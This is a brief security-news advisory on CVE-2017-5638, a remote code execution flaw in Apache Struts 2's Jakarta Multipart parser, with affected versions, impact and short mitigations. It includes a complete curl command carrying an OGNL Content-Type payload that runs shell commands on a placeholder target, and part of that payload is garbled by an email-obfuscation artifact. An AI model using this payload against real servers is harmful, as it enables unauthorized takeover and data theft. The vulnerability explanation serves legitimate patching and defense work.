Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts endpoint, the framework attempts to process it to generate an error message. The attacker embeds an Object-Graph Navigation Language (OGNL) expression within this header. Due to the insufficient validation during this error-handling workflow, the embedded OGNL expression is evaluated instead of being treated as a simple string. OGNL is a powerful expression language integrated with Struts that can access and execute Java code. This unintended evaluation allows an unauthenticated attacker to achieve remote code execution with the privileges of the Struts application server, simply by crafting a malicious HTTP request with a harmful Content-Type value, without needing to upload a file.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`

How Exploit:

Craft malicious HTTP request.

Inject OGNL in header.

Trigger parser error.

Execute arbitrary commands.

Protection from this CVE

Apply vendor patch.

Upgrade Struts version.

Use WAF filtering.

Input validation.

Impact:

Full system compromise.

Data theft.

Service disruption.

Arbitrary code execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top